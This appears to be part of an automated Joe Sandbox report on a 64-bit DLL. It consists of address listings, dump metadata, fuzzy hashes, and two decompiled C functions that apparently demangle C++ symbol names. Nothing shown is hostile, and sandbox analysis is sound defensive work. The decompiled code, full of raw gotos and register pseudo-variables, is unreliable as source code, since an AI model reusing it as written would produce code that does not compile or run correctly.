                                                                      0x180007ddc
                                                                      0x180007de2
                                                                      0x180007def
                                                                      0x180007df4
                                                                      0x180007e01
                                                                      0x180007e06
                                                                      0x180007e0d
                                                                      0x180007e14
                                                                      0x180007e1c
                                                                      0x180007e20
                                                                      0x180007e25
                                                                      0x180007e2e
                                                                      0x180007e35
                                                                      0x180007e3a
                                                                      0x180007e3d
                                                                      0x180007e49
                                                                      0x180007e50
                                                                      0x180007e54
                                                                      0x180007e5b
                                                                      0x180007e63
                                                                      0x180007e68
                                                                      0x180007e6d
                                                                      0x180007e6f
                                                                      0x180007e72
                                                                      0x180007e77
                                                                      0x180007e7d
                                                                      0x180007e8a
                                                                      0x180007e8f
                                                                      0x180007e9c
                                                                      0x180007ea1
                                                                      0x180007eae
                                                                      0x180007eb3
                                                                      0x180007eb6
                                                                      0x180007ebc
                                                                      0x180007ec5
                                                                      0x180007ece
                                                                      0x180007ed3
                                                                      0x180007ed8
                                                                      0x180007edd
                                                                      0x180007ee3
                                                                      0x180007ee3
                                                                      0x180007eee
                                                                      0x180007ef3
                                                                      0x180007f00
                                                                      0x180007f05
                                                                      0x180007f12
                                                                      0x180007f1c
                                                                      0x180007f21
                                                                      0x180007f28
                                                                      0x180007f2b
                                                                      0x180007f2f
                                                                      0x180007f35
                                                                      0x180007f46
                                                                      0x180007f49
                                                                      0x180007f50
                                                                      0x180007f5a
                                                                      0x180007f5c
                                                                      0x180007f6a
                                                                      0x180007f6e
                                                                      0x180007f72
                                                                      0x180007f7a
                                                                      0x180007f7f
                                                                      0x180007f84
                                                                      0x180007f8b
                                                                      0x180007f8e
                                                                      0x180007f91
                                                                      0x180007f99
                                                                      0x180007f9d
                                                                      0x180007fa3
                                                                      0x180007fa5
                                                                      0x180007fa5
                                                                      0x180007fb4
                                                                      0x180007fbb
                                                                      0x180007fbd
                                                                      0x180007fcb
                                                                      0x180007fd3
                                                                      0x180007fdb
                                                                      0x180007fe0
                                                                      0x180007fe5
                                                                      0x180007fe7
                                                                      0x180007fe9
                                                                      0x180007feb
                                                                      0x180007ffc
                                                                      0x180008001
                                                                      0x180008007
                                                                      0x180008012
                                                                      0x180008017
                                                                      0x18000801c
                                                                      0x180008029
                                                                      0x18000802b
                                                                      0x180008038
                                                                      0x18000803d
                                                                      0x180008042
                                                                      0x180008047
                                                                      0x18000804c
                                                                      0x180008051
                                                                      0x180008053
                                                                      0x180008060
                                                                      0x180008062
                                                                      0x180008069
                                                                      0x18000806e
                                                                      0x18000807b
                                                                      0x18000807d
                                                                      0x18000808a
                                                                      0x18000808c
                                                                      0x18000809d
                                                                      0x1800080a6
                                                                      0x1800080a8
                                                                      0x1800080ae
                                                                      0x1800080b4
                                                                      0x1800080b6
                                                                      0x1800080be
                                                                      0x1800080c4
                                                                      0x1800080cd
                                                                      0x1800080d4
                                                                      0x1800080dd
                                                                      0x1800080e4
                                                                      0x1800080ec
                                                                      0x1800080f4
                                                                      0x1800080f9
                                                                      0x180008109
                                                                      0x180008112
                                                                      0x180008119
                                                                      0x180008120
                                                                      0x180008122
                                                                      0x18000812b
                                                                      0x180008131
                                                                      0x180008141
                                                                      0x18000814e
                                                                      0x180008157
                                                                      0x18000815d
                                                                      0x180008160
                                                                      0x180008162
                                                                      0x18000816d
                                                                      0x18000819c

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: Name::operator+
                                                                      • String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $auto$bool$char$char16_t$char32_t$char8_t$const$decltype(auto)$double$float$int$long$long $short$signed $unsigned $void$volatile$wchar_t
                                                                      • API String ID: 2943138195-1388207849
                                                                      • Opcode ID: c8a402314889fce63f01c6b61dfd3c56fd10d88661932eef69ab3739cb1f739c
                                                                      • Instruction ID: b39fc46dc725cb4d1ef92941e397d6ad202ef5c9a9e183125abf31206537e76d
                                                                      • Opcode Fuzzy Hash: c8a402314889fce63f01c6b61dfd3c56fd10d88661932eef69ab3739cb1f739c
                                                                      • Instruction Fuzzy Hash: 2EF15C72B10A1898FBE6CB68D4543FD37A1BB1C7C4F40C51AEA4916AA9DF39874CD740
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 87%
                                                                      			E0000000118000B5B8(void* __edi, long long __rbx, long long* __rcx, long long __rdi, long long __rsi, void* __r10, void* __r11, void* __r12) {
                                                                      				void* __r14;
                                                                      				intOrPtr _t148;
                                                                      				void* _t149;
                                                                      				void* _t166;
                                                                      				void* _t167;
                                                                      				void* _t170;
                                                                      				void* _t184;
                                                                      				signed char* _t185;
                                                                      				char* _t188;
                                                                      				intOrPtr _t189;
                                                                      				intOrPtr* _t190;
                                                                      				intOrPtr* _t192;
                                                                      				char* _t193;
                                                                      				intOrPtr* _t196;
                                                                      				char* _t197;
                                                                      				long long _t201;
                                                                      				intOrPtr* _t233;
                                                                      				char* _t244;
                                                                      				void* _t245;
                                                                      				void* _t249;
                                                                      				void* _t251;
                                                                      				void* _t259;
                                                                      				long long* _t265;
                                                                      				void* _t270;
                                                                      				void* _t272;
                                                                      				void* _t273;
                                                                      				void* _t291;
                                                                      				long long _t292;
                                                                      				long long _t294;
                                                                      
                                                                      				_t290 = __r12;
                                                                      				_t288 = __r11;
                                                                      				_t287 = __r10;
                                                                      				_t267 = __rsi;
                                                                      				_t200 = __rbx;
                                                                      				_t184 = _t272;
                                                                      				 *((long long*)(_t184 + 8)) = __rbx;
                                                                      				 *((long long*)(_t184 + 0x10)) = __rsi;
                                                                      				 *((long long*)(_t184 + 0x18)) = __rdi;
                                                                      				_t270 = _t184 - 0x158;
                                                                      				_t273 = _t272 - 0x240;
                                                                      				r14d = 0;
                                                                      				_t292 = "::";
                                                                      				 *__rcx = _t294;
                                                                      				sil = r14b;
                                                                      				 *((intOrPtr*)(__rcx + 8)) = r14d;
                                                                      				_t265 = __rcx;
                                                                      				_t185 =  *0x80071308; // 0x0
                                                                      				if (( *_t185 & 0x000000bf) == 0) goto 0x8000b9c6;
                                                                      				_t166 =  *0x8007131c - r14b; // 0x0
                                                                      				if (_t166 == 0) goto 0x8000b617;
                                                                      				_t167 =  *0x8007131d - r14b; // 0x0
                                                                      				if (_t167 == 0) goto 0x8000ba4b;
                                                                      				if ( *((intOrPtr*)(__rcx)) == _t294) goto 0x8000b697;
                                                                      				 *((long long*)(_t270 - 0x60)) = _t292;
                                                                      				 *((intOrPtr*)(_t270 - 0x58)) = 2;
                                                                      				asm("movaps xmm0, [ebp-0x60]");
                                                                      				asm("movdqa [esp+0x40], xmm0");
                                                                      				E000000011800059CC(_t185, _t270 + 0x30, _t273 + 0x40);
                                                                      				E00000001180005F48(_t185, _t270 - 0x50, __rcx);
                                                                      				 *_t265 =  *((intOrPtr*)(_t270 - 0x50));
                                                                      				 *((intOrPtr*)(_t265 + 8)) =  *((intOrPtr*)(_t270 - 0x48));
                                                                      				if (sil == 0) goto 0x8000b697;
                                                                      				 *((long long*)(_t273 + 0x50)) = _t294;
                                                                      				 *((intOrPtr*)(_t273 + 0x58)) = r14d;
                                                                      				E00000001180007320(0x5b,  *((intOrPtr*)(_t270 - 0x50)), __rbx, _t273 + 0x50);
                                                                      				E00000001180005F48(_t273 + 0x50, _t270 - 0x40, _t265);
                                                                      				sil = r14b;
                                                                      				 *_t265 =  *((intOrPtr*)(_t270 - 0x40));
                                                                      				 *((intOrPtr*)(_t265 + 8)) =  *((intOrPtr*)(_t270 - 0x38));
                                                                      				_t188 =  *0x80071308; // 0x0
                                                                      				_t170 =  *_t188 - 0x3f;
                                                                      				if (_t170 != 0) goto 0x8000b993;
                                                                      				_t24 = _t188 + 1; // 0x1
                                                                      				_t244 = _t24;
                                                                      				 *0x80071308 = _t244;
                                                                      				if (_t170 == 0) goto 0x8000b96e;
                                                                      				if (_t170 == 0) goto 0x8000b8f8;
                                                                      				if (_t170 == 0) goto 0x8000b845;
                                                                      				if (_t170 == 0) goto 0x8000b8f8;
                                                                      				if (_t170 == 0) goto 0x8000b800;
                                                                      				if ( *_t244 - 0xffffffffffffffff == 8) goto 0x8000b6fc;
                                                                      				E00000001180009FAC( *_t244 - 0xffffffffffffffff - 8, _t188, _t200, _t270 + 0x40, _t244, __rsi, _t265, __r10, __r11, _t294);
                                                                      				_t245 = _t270 + 0x130;
                                                                      				goto 0x8000b9a5;
                                                                      				_t201 = _t294;
                                                                      				 *((intOrPtr*)(_t273 + 0x28)) = r14d;
                                                                      				_t28 = _t245 + 1; // 0x2
                                                                      				_t189 = _t28;
                                                                      				 *((long long*)(_t273 + 0x20)) = _t201;
                                                                      				 *0x80071308 = _t189;
                                                                      				r8d = 0;
                                                                      				E0000000118000D698(_t149,  *_t244 - 0xffffffffffffffff, 1, __edi, _t201, _t273 + 0x60, _t265, __rsi, _t265, __r10, __r11);
                                                                      				if ( *((intOrPtr*)(_t273 + 0x68)) != 0) goto 0x8000b77f;
                                                                      				if (_t201 == 0) goto 0x8000b778;
                                                                      				 *((long long*)(_t270 - 0x30)) = _t292;
                                                                      				 *((intOrPtr*)(_t270 - 0x28)) = 2;
                                                                      				asm("movaps xmm0, [ebp-0x30]");
                                                                      				asm("movdqa [esp+0x40], xmm0");
                                                                      				E00000001180005F1C(_t273 + 0x60, _t270 + 0x120, _t273 + 0x40);
                                                                      				E00000001180005F48(_t189, _t270 + 0x50, _t273 + 0x20);
                                                                      				 *((intOrPtr*)(_t273 + 0x28)) =  *((intOrPtr*)(_t189 + 8));
                                                                      				goto 0x8000b78a;
                                                                      				goto 0x8000b772;
                                                                      				 *((intOrPtr*)(_t273 + 0x28)) = 2;
                                                                      				 *((long long*)(_t273 + 0x20)) = _t294;
                                                                      				if ( *((intOrPtr*)(_t273 + 0x28)) != r14b) goto 0x8000b7f0;
                                                                      				_t190 =  *0x80071308; // 0x0
                                                                      				if ( *_t190 != 0x40) goto 0x8000b714;
                                                                      				 *((long long*)(_t273 + 0x70)) = _t294;
                                                                      				 *((intOrPtr*)(_t273 + 0x78)) = r14d;
                                                                      				E00000001180007320(0x5b, _t190, _t294, _t273 + 0x70);
                                                                      				E00000001180005F48(_t273 + 0x70, _t270 - 0x10, _t273 + 0x20);
                                                                      				r8b = 0x5d;
                                                                      				_t249 = _t270 + 0x60;
                                                                      				E00000001180005F74(_t270 - 0x10, _t249);
                                                                      				 *_t265 =  *_t190;
                                                                      				 *((intOrPtr*)(_t265 + 8)) =  *((intOrPtr*)(_t190 + 8));
                                                                      				goto 0x8000b89b;
                                                                      				 *((intOrPtr*)(_t265 + 8)) = r14d;
                                                                      				 *((char*)(_t265 + 8)) = 2;
                                                                      				 *_t265 = _t294;
                                                                      				goto 0x8000b9bc;
                                                                      				_t57 = _t249 + 1; // 0x2
                                                                      				r8d = 0;
                                                                      				 *0x80071308 = _t57;
                                                                      				E0000000118000D698(_t149,  *_t244 - 0xffffffffffffffff, 1, __edi, _t294, _t270 + 0x70, _t265, _t267, _t273 + 0x20, __r10, __r11);
                                                                      				r8b = 0x5d;
                                                                      				E00000001180005F74(_t57, _t270 + 0x80);
                                                                      				_t251 = _t270 + 0x90;
                                                                      				E00000001180005F48(_t57, _t251, _t265);
                                                                      				sil = 1;
                                                                      				goto 0x8000b9b0;
                                                                      				if ( *((char*)(_t251 + 1)) != 0x5f) goto 0x8000b8a7;
                                                                      				if ( *((char*)(_t251 + 2)) != 0x3f) goto 0x8000b8a7;
                                                                      				_t63 = _t251 + 1; // 0x2
                                                                      				_t192 = _t63;
                                                                      				r8d = 0;
                                                                      				 *0x80071308 = _t192;
                                                                      				E0000000118000A220( *_t244 - 0xffffffffffffffff, 0, __edi, _t294, _t270 + 0xa0, _t265, _t267, _t265, __r12);
                                                                      				E00000001180005F48(_t192, _t270 + 0xb0, _t265);
                                                                      				 *_t265 =  *_t192;
                                                                      				 *((intOrPtr*)(_t265 + 8)) =  *((intOrPtr*)(_t192 + 8));
                                                                      				_t193 =  *0x80071308; // 0x0
                                                                      				if ( *_t193 != 0x40) goto 0x8000b9bc;
                                                                      				 *0x80071308 =  *0x80071308 + 1;
                                                                      				goto 0x8000b9bc;
                                                                      				E00000001180008E04(__edi,  *_t193 - 0x40, _t193, _t294, _t270 + 0xc0, _t270 + 0xb0, _t265, _t267, _t265, _t290, _t294);
                                                                      				 *((long long*)(_t270 - 0x80)) = _t294;
                                                                      				 *((intOrPtr*)(_t270 - 0x78)) = r14d;
                                                                      				E00000001180007320(0x60, _t193, _t193, _t270 - 0x80);
                                                                      				E00000001180005F48(_t270 - 0x80, _t270, _t193);
                                                                      				r8b = 0x27;
                                                                      				E00000001180005F74(_t270, _t270 + 0xd0);
                                                                      				goto 0x8000b9a5;
                                                                      				r8b = 0x40;
                                                                      				E0000000118000591C(_t193, _t193, _t270 - 0x70, 0x80071308, _t267, _t291);
                                                                      				 *((intOrPtr*)(_t270 - 0x18)) = 0x15;
                                                                      				 *((long long*)(_t270 - 0x20)) = "`anonymous namespace\'";
                                                                      				asm("movaps xmm0, [ebp-0x20]");
                                                                      				asm("movdqa [esp+0x40], xmm0");
                                                                      				E000000011800059CC("`anonymous namespace\'", _t270 + 0xf0, _t273 + 0x40);
                                                                      				E00000001180005F48("`anonymous namespace\'", _t273 + 0x30, _t265);
                                                                      				 *_t265 =  *((intOrPtr*)(_t273 + 0x30));
                                                                      				 *((intOrPtr*)(_t265 + 8)) =  *((intOrPtr*)(_t273 + 0x38));
                                                                      				_t233 =  *0x800712f8; // 0x0
                                                                      				if ( *_t233 == 9) goto 0x8000b9bc;
                                                                      				_t259 = _t270 - 0x70;
                                                                      				E000000011800062B0( *((intOrPtr*)(_t273 + 0x30)), _t193, _t233, _t259);
                                                                      				goto 0x8000b9bc;
                                                                      				_t85 = _t259 - 1; // 0x0
                                                                      				_t196 = _t85;
                                                                      				r8d = 0;
                                                                      				 *0x80071308 = _t196;
                                                                      				E0000000118000D698(_t149,  *_t244 - 0xffffffffffffffff, 1, __edi, _t193, _t270 + 0x100, _t265, _t267, _t265, _t287, _t288);
                                                                      				goto 0x8000b9a5;
                                                                      				r8d = 0;
                                                                      				E0000000118000D698(_t149,  *_t244 - 0xffffffffffffffff, 1, __edi, _t193, _t270 + 0x20, _t265, _t267, _t265, _t287, _t288);
                                                                      				E00000001180005F48(_t196, _t270 + 0x10, _t265);
                                                                      				 *_t265 =  *_t196;
                                                                      				 *((intOrPtr*)(_t265 + 8)) =  *((intOrPtr*)(_t196 + 8));
                                                                      				if ( *((intOrPtr*)(_t265 + 8)) == r14b) goto 0x8000b5f1;
                                                                      				_t197 =  *0x80071308; // 0x0
                                                                      				if ( *_t197 == r14b) goto 0x8000b9e4;
                                                                      				if ( *_t197 == 0x40) goto 0x8000ba4b;
                                                                      				 *((intOrPtr*)(_t265 + 8)) = r14d;
                                                                      				 *((char*)(_t265 + 8)) = 2;
                                                                      				 *_t265 = _t294;
                                                                      				goto 0x8000ba4b;
                                                                      				if ( *_t265 != _t294) goto 0x8000b9fd;
                                                                      				 *((intOrPtr*)(_t265 + 8)) = r14d;
                                                                      				 *((char*)(_t265 + 8)) = 1;
                                                                      				 *_t265 = 0x8005f780;
                                                                      				goto 0x8000ba4b;
                                                                      				 *((long long*)(_t273 + 0x30)) = _t292;
                                                                      				 *((intOrPtr*)(_t273 + 0x38)) = 2;
                                                                      				asm("movaps xmm0, [esp+0x30]");
                                                                      				asm("movdqa [ebp-0x70], xmm0");
                                                                      				 *((intOrPtr*)(_t273 + 0x38)) = r14d;
                                                                      				 *((long long*)(_t273 + 0x30)) = 0x8005f780;
                                                                      				E00000001180005F1C(_t273 + 0x30, _t270 + 0x10, _t270 - 0x70);
                                                                      				E00000001180005F48(0x8005f780, _t270 + 0x20, _t265);
                                                                      				 *_t265 =  *0x8005f780;
                                                                      				_t148 =  *0x18005F788;
                                                                      				 *((intOrPtr*)(_t265 + 8)) = _t148;
                                                                      				return _t148;
                                                                      			}
































                                                                      0x18000b5b8
                                                                      0x18000b5b8
                                                                      0x18000b5b8
                                                                      0x18000b5b8
                                                                      0x18000b5b8
                                                                      0x18000b5b8
                                                                      0x18000b5bb
                                                                      0x18000b5bf
                                                                      0x18000b5c3
                                                                      0x18000b5cc
                                                                      0x18000b5d3
                                                                      0x18000b5da
                                                                      0x18000b5dd
                                                                      0x18000b5e4
                                                                      0x18000b5e7
                                                                      0x18000b5ea
                                                                      0x18000b5ee
                                                                      0x18000b5f1
                                                                      0x18000b5fb
                                                                      0x18000b601
                                                                      0x18000b608
                                                                      0x18000b60a
                                                                      0x18000b611
                                                                      0x18000b61a
                                                                      0x18000b61c
                                                                      0x18000b625
                                                                      0x18000b630
                                                                      0x18000b634
                                                                      0x18000b63a
                                                                      0x18000b649
                                                                      0x18000b652
                                                                      0x18000b658
                                                                      0x18000b65e
                                                                      0x18000b662
                                                                      0x18000b66c
                                                                      0x18000b671
                                                                      0x18000b682
                                                                      0x18000b68b
                                                                      0x18000b68e
                                                                      0x18000b694
                                                                      0x18000b697
                                                                      0x18000b69e
                                                                      0x18000b6a1
                                                                      0x18000b6a7
                                                                      0x18000b6a7
                                                                      0x18000b6ab
                                                                      0x18000b6b8
                                                                      0x18000b6c1
                                                                      0x18000b6ca
                                                                      0x18000b6d3
                                                                      0x18000b6dc
                                                                      0x18000b6e5
                                                                      0x18000b6eb
                                                                      0x18000b6f0
                                                                      0x18000b6f7
                                                                      0x18000b6fc
                                                                      0x18000b6ff
                                                                      0x18000b704
                                                                      0x18000b704
                                                                      0x18000b708
                                                                      0x18000b70d
                                                                      0x18000b714
                                                                      0x18000b71e
                                                                      0x18000b729
                                                                      0x18000b72e
                                                                      0x18000b730
                                                                      0x18000b739
                                                                      0x18000b747
                                                                      0x18000b750
                                                                      0x18000b756
                                                                      0x18000b767
                                                                      0x18000b772
                                                                      0x18000b776
                                                                      0x18000b77d
                                                                      0x18000b77f
                                                                      0x18000b78a
                                                                      0x18000b794
                                                                      0x18000b796
                                                                      0x18000b7a0
                                                                      0x18000b7a8
                                                                      0x18000b7b2
                                                                      0x18000b7b7
                                                                      0x18000b7ca
                                                                      0x18000b7cf
                                                                      0x18000b7d2
                                                                      0x18000b7da
                                                                      0x18000b7e2
                                                                      0x18000b7e8
                                                                      0x18000b7eb
                                                                      0x18000b7f0
                                                                      0x18000b7f4
                                                                      0x18000b7f8
                                                                      0x18000b7fb
                                                                      0x18000b800
                                                                      0x18000b804
                                                                      0x18000b809
                                                                      0x18000b814
                                                                      0x18000b819
                                                                      0x18000b826
                                                                      0x18000b82e
                                                                      0x18000b838
                                                                      0x18000b83d
                                                                      0x18000b840
                                                                      0x18000b849
                                                                      0x18000b84f
                                                                      0x18000b851
                                                                      0x18000b851
                                                                      0x18000b855
                                                                      0x18000b85a
                                                                      0x18000b868
                                                                      0x18000b87a
                                                                      0x18000b882
                                                                      0x18000b888
                                                                      0x18000b88b
                                                                      0x18000b895
                                                                      0x18000b89b
                                                                      0x18000b8a2
                                                                      0x18000b8ae
                                                                      0x18000b8b5
                                                                      0x18000b8bd
                                                                      0x18000b8c4
                                                                      0x18000b8d4
                                                                      0x18000b8d9
                                                                      0x18000b8e7
                                                                      0x18000b8f3
                                                                      0x18000b8f8
                                                                      0x18000b906
                                                                      0x18000b912
                                                                      0x18000b919
                                                                      0x18000b922
                                                                      0x18000b92d
                                                                      0x18000b933
                                                                      0x18000b943
                                                                      0x18000b94d
                                                                      0x18000b954
                                                                      0x18000b957
                                                                      0x18000b961
                                                                      0x18000b963
                                                                      0x18000b967
                                                                      0x18000b96c
                                                                      0x18000b96e
                                                                      0x18000b96e
                                                                      0x18000b972
                                                                      0x18000b977
                                                                      0x18000b985
                                                                      0x18000b991
                                                                      0x18000b993
                                                                      0x18000b99c
                                                                      0x18000b9ab
                                                                      0x18000b9b3
                                                                      0x18000b9b9
                                                                      0x18000b9c0
                                                                      0x18000b9c6
                                                                      0x18000b9d0
                                                                      0x18000b9d5
                                                                      0x18000b9d7
                                                                      0x18000b9db
                                                                      0x18000b9df
                                                                      0x18000b9e2
                                                                      0x18000b9ee
                                                                      0x18000b9f0
                                                                      0x18000b9f4
                                                                      0x18000b9f8
                                                                      0x18000b9fb
                                                                      0x18000b9fd
                                                                      0x18000ba06
                                                                      0x18000ba12
                                                                      0x18000ba1c
                                                                      0x18000ba21
                                                                      0x18000ba26
                                                                      0x18000ba2b
                                                                      0x18000ba3a
                                                                      0x18000ba42
                                                                      0x18000ba45
                                                                      0x18000ba48
                                                                      0x18000ba6a

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: Name::operator+$Replicator::operator[]
                                                                      • String ID: `anonymous namespace'
                                                                      • API String ID: 3863519203-3062148218
                                                                      • Opcode ID: b1a8f4b93ca95f0d8e521a5e6b2d1fffb50fe6c2471dfd5a5221165a7b848607
                                                                      • Instruction ID: 2e1dcf1b6e2eed3c87213ec8f5259485e2ef4c4c37b92cd01a55025e2cf14b7f
                                                                      • Opcode Fuzzy Hash: b1a8f4b93ca95f0d8e521a5e6b2d1fffb50fe6c2471dfd5a5221165a7b848607
                                                                      • Instruction Fuzzy Hash: DFE13872604B8999EB92CF24E4803ED77A0F349784F94D116EB8957BA6DF39C658CB00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 88%
                                                                      			E000000011800099B4(void* __ecx, void* __edi, long long __rbx, long long* __rcx, intOrPtr* __rdx, long long __rdi, long long __rsi) {
                                                                      				void* __r12;
                                                                      				signed int _t169;
                                                                      				unsigned int _t173;
                                                                      				unsigned int _t184;
                                                                      				unsigned int _t212;
                                                                      				signed int _t225;
                                                                      				void* _t228;
                                                                      				signed int _t229;
                                                                      				unsigned int _t230;
                                                                      				signed int _t250;
                                                                      				void* _t259;
                                                                      				void* _t285;
                                                                      				intOrPtr* _t289;
                                                                      				char* _t292;
                                                                      				long long* _t294;
                                                                      				long long _t296;
                                                                      				intOrPtr* _t304;
                                                                      				char* _t305;
                                                                      				char* _t306;
                                                                      				char* _t347;
                                                                      				void* _t353;
                                                                      				long long* _t370;
                                                                      				long long* _t374;
                                                                      				void* _t376;
                                                                      				void* _t377;
                                                                      				void* _t379;
                                                                      				void* _t395;
                                                                      				void* _t396;
                                                                      				void* _t398;
                                                                      				long long _t400;
                                                                      				void* _t402;
                                                                      				void* _t406;
                                                                      				intOrPtr* _t407;
                                                                      
                                                                      				_t372 = __rsi;
                                                                      				_t245 = __edi;
                                                                      				_t228 = __ecx;
                                                                      				_t285 = _t379;
                                                                      				 *((long long*)(_t285 + 8)) = __rbx;
                                                                      				 *((long long*)(_t285 + 0x10)) = __rsi;
                                                                      				 *((long long*)(_t285 + 0x18)) = __rdi;
                                                                      				_t377 = _t285 - 0x5f;
                                                                      				_t370 = __rcx;
                                                                      				r13d = 0;
                                                                      				_t304 =  *0x80071308; // 0x0
                                                                      				_t407 = __rdx;
                                                                      				if ( *_t304 != r13b) goto 0x80009a0f;
                                                                      				 *(_t377 - 0x11) = r13d;
                                                                      				 *((long long*)(_t377 - 0x19)) = 0x8005f780;
                                                                      				_t305 = _t377 - 0x19;
                                                                      				E00000001180005F48(_t305, __rcx, __rdx);
                                                                      				goto 0x80009ec5;
                                                                      				if ( *_t305 - 0x36 - 3 <= 0) goto 0x80009a20;
                                                                      				if ( *_t305 != 0x5f) goto 0x80009eba;
                                                                      				r8d = r8d | 0xffffffff;
                                                                      				_t306 = _t305 + 1;
                                                                      				 *0x80071308 = _t306;
                                                                      				if ( *_t305 - 0x36 != 0x29) goto 0x80009a5e;
                                                                      				if ( *_t306 == r13b) goto 0x800099ec;
                                                                      				_t8 = _t306 + 1; // 0x2
                                                                      				_t347 = _t8;
                                                                      				 *0x80071308 = _t347;
                                                                      				_t250 =  >  ? r8d :  *_t306 - 0x3d;
                                                                      				goto 0x80009a72;
                                                                      				if (_t250 < 0) goto 0x80009eba;
                                                                      				if (_t250 - 3 > 0) goto 0x80009eba;
                                                                      				_t259 = _t250 - r8d;
                                                                      				if (_t259 == 0) goto 0x80009eba;
                                                                      				r12d = _t250;
                                                                      				 *((long long*)(_t377 - 0x29)) = _t400;
                                                                      				 *(_t377 - 0x21) = r13d;
                                                                      				 *((long long*)(_t377 - 0x39)) =  *_t407;
                                                                      				 *(_t377 - 0x31) =  *(_t407 + 8);
                                                                      				r12d = r12d & 0x00000002;
                                                                      				if (_t259 == 0) goto 0x80009bee;
                                                                      				if ( *_t347 == 0x40) goto 0x80009b7c;
                                                                      				 *(_t377 - 0x11) = 2;
                                                                      				 *((long long*)(_t377 - 0x19)) = "::";
                                                                      				asm("movaps xmm0, [ebp-0x19]");
                                                                      				asm("movdqa [ebp+0x7], xmm0");
                                                                      				E000000011800059CC("::", _t377 - 9, _t377 + 7);
                                                                      				E00000001180005F48("::", _t377 - 0x19, _t377 - 0x39);
                                                                      				 *((long long*)(_t377 - 0x39)) =  *((intOrPtr*)(_t377 - 0x19));
                                                                      				 *(_t377 - 0x31) =  *(_t377 - 0x11);
                                                                      				_t289 =  *0x80071308; // 0x0
                                                                      				if ( *_t289 == r13b) goto 0x80009b4c;
                                                                      				E0000000118000B5B8(__edi, __rbx, _t377 - 9, _t370, __rsi, _t395, _t396, _t398);
                                                                      				 *((long long*)(_t377 - 0x19)) = _t400;
                                                                      				 *(_t377 - 0x11) = r13d;
                                                                      				E00000001180007320(0x20, _t289, _t289, _t377 - 0x19);
                                                                      				E00000001180005F48(_t377 - 0x19, _t377 + 7, _t289);
                                                                      				E00000001180005F48(_t377 + 7, _t377 + 0x27, _t377 - 0x39);
                                                                      				 *((long long*)(_t377 - 0x39)) =  *_t289;
                                                                      				goto 0x80009b70;
                                                                      				 *(_t377 - 0x11) = r13d;
                                                                      				_t353 = _t377 - 9;
                                                                      				 *((long long*)(_t377 - 0x19)) = 0x8005f780;
                                                                      				E00000001180005F48(_t377 - 0x19, _t353, _t377 - 0x39);
                                                                      				 *((long long*)(_t377 - 0x39)) =  *((intOrPtr*)(_t377 - 9));
                                                                      				 *(_t377 - 0x31) =  *(_t377 - 1);
                                                                      				goto 0x80009b87;
                                                                      				_t45 = _t353 + 1; // 0x2
                                                                      				_t292 = _t45;
                                                                      				 *0x80071308 = _t292;
                                                                      				if ( *_t292 == r13b) goto 0x80009c88;
                                                                      				if ( *_t292 != 0x40) goto 0x80009eba;
                                                                      				 *((long long*)(_t377 - 9)) = _t400;
                                                                      				 *0x80071308 = _t292 + 1;
                                                                      				r8d = 0;
                                                                      				_t169 =  *0x80071318; // 0x0
                                                                      				 *(_t377 - 1) = r13d;
                                                                      				 *((intOrPtr*)(_t379 - 0xa0 + 0x20)) = 1;
                                                                      				if ((_t169 & 0x00000060) == 0x60) goto 0x80009c5c;
                                                                      				 *((long long*)(_t377 - 0x19)) = _t400;
                                                                      				 *(_t377 - 0x11) = r13d;
                                                                      				E0000000118000841C(__edi, _t289, _t377 + 7, _t377 - 0x19, _t370, _t372, _t377 - 9);
                                                                      				_t294 =  *((intOrPtr*)(_t377 + 7));
                                                                      				 *((long long*)(_t377 - 0x29)) = _t294;
                                                                      				 *(_t377 - 0x21) =  *(_t377 + 0xf);
                                                                      				r14d = 0xffffff00;
                                                                      				if ((sil & 0x00000004) == 0) goto 0x80009cba;
                                                                      				_t173 =  *0x80071318; // 0x0
                                                                      				if (( !(_t173 >> 1) & 0x00000001) == 0) goto 0x80009c9d;
                                                                      				E00000001180007AF8(_t228, __edi,  !(_t173 >> 1) & 0x00000001, _t294, _t289, _t377 + 0x27, _t372, _t377 - 0x39, _t406);
                                                                      				 *((long long*)(_t377 - 0x19)) = _t400;
                                                                      				 *(_t377 - 0x11) = r13d;
                                                                      				_t300 = _t294;
                                                                      				E00000001180007320(0x20, _t294, _t294, _t377 - 0x19);
                                                                      				E00000001180005F48(_t377 - 0x19, _t377 + 7, _t294);
                                                                      				E00000001180005F48(_t377 + 7, _t377 - 9, _t377 - 0x39);
                                                                      				 *((long long*)(_t377 - 0x39)) =  *_t294;
                                                                      				goto 0x80009cb7;
                                                                      				 *((long long*)(_t377 + 7)) = _t400;
